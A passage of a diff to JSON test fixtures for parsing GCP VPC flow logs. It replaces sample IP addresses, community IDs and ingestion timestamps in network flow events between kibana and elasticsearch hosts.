"address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -7191,7 +7191,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:kmlKCdqw/+vcFaSeBx9hVkJjnAE=", + "community_id": "1:C7B7lD6dSCm1Xnh0Cv/Rl2jt7CY=", "bytes": 60222, "name": "default", "transport": "tcp", @@ -7214,7 +7214,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -7250,8 +7250,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868680700Z", - "original": "{\"insertId\":\"bnj3cofh3cdk4\",\"jsonPayload\":{\"bytes_sent\":\"60222\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391558100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk4\",\"jsonPayload\":{\"bytes_sent\":\"60222\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", "end": "2019-06-14T03:49:59.597279654Z", @@ -7272,10 +7272,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -7289,7 +7289,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:8Fb+m/uf2rxjkmtxbzg2YY6RXUU=", + "community_id": "1:XmuS4IfRKFgBkcu5l3y4LFKss2g=", "bytes": 61810, "name": "default", "transport": "tcp", @@ -7312,7 +7312,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -7348,8 +7348,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868683900Z", - "original": "{\"insertId\":\"bnj3cofh3cdkf\",\"jsonPayload\":{\"bytes_sent\":\"61810\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"358\",\"reporter\":\"SRC\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391562800Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkf\",\"jsonPayload\":{\"bytes_sent\":\"61810\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"358\",\"reporter\":\"SRC\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -7376,17 +7376,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 58216, "bytes": 1467, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5iAZA+PYVbiwpnPFNQCxKlsIp60=", + "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -7400,7 +7400,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -7425,8 +7425,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868686900Z", - "original": "{\"insertId\":\"bnj3cofh3cdkl\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":58216},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391566200Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkl\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":58216},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:49:36.865198297Z", "end": "2019-06-14T03:49:36.982303071Z", @@ -7453,18 +7453,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 136558, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 243 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8Fb+m/uf2rxjkmtxbzg2YY6RXUU=", + "community_id": "1:XmuS4IfRKFgBkcu5l3y4LFKss2g=", "bytes": 136558, "name": "default", "transport": "tcp", @@ -7486,7 +7486,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -7523,8 +7523,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868690Z", - "original": "{\"insertId\":\"bnj3cofh3cdk2\",\"jsonPayload\":{\"bytes_sent\":\"136558\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"243\",\"reporter\":\"DEST\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391570400Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk2\",\"jsonPayload\":{\"bytes_sent\":\"136558\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"243\",\"reporter\":\"DEST\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -7545,9 +7545,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34906, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -7561,7 +7561,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jbQzsE/elxbdsdcfLH3Z+WY7yoA=", + "community_id": "1:w9XiZoaEVIGVzEG0jduGM1uQWNw=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -7576,7 +7576,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -7600,8 +7600,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868693100Z", - "original": "{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391575400Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdko\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34906,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:48:50.642206049Z", "end": "2019-06-14T03:48:50.757255245Z", @@ -7622,9 +7622,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52454, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -7638,7 +7638,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:x8E1sBwJRB/brRn7+TWuuDv6Seg=", + "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -7653,7 +7653,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -7677,8 +7677,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868696200Z", - "original": "{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391580300Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdke\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52454,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:40.779893091Z", "end": "2019-06-14T03:42:40.888804332Z", @@ -7705,17 +7705,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34090, "bytes": 1467, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Tx2SSXIplYZjqzTurpvVWc2USh0=", + "community_id": "1:r0YXIwQbyBtxc4laQWML5QBB+Tw=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -7729,7 +7729,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -7754,8 +7754,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868699300Z", - "original": "{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391584100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdka\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34090},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:37.712749588Z", "end": "2019-06-14T03:46:37.827345444Z", @@ -7782,18 +7782,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 170396, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ZvwQ2j/3ZuFaLSX6WH5V4iy9utU=", + "community_id": "1:IEnrf1LJAN4LjLMkDE8yTRHo3KA=", "bytes": 170396, "name": "default", "transport": "tcp", @@ -7815,7 +7815,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -7852,8 +7852,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868702300Z", - "original": "{\"insertId\":\"bnj3cofh3cdkn\",\"jsonPayload\":{\"bytes_sent\":\"170396\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391588500Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkn\",\"jsonPayload\":{\"bytes_sent\":\"170396\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", "end": "2019-06-14T03:49:59.565300944Z", @@ -7874,10 +7874,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33570, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -7891,7 +7891,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:W60ErjE9kT0Dm5xlbB8kttSgelA=", + "community_id": "1:F7T6LmH5wVzEgGnm1LS0ir3ltmg=", "bytes": 171610, "name": "default", "transport": "tcp", @@ -7914,7 +7914,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
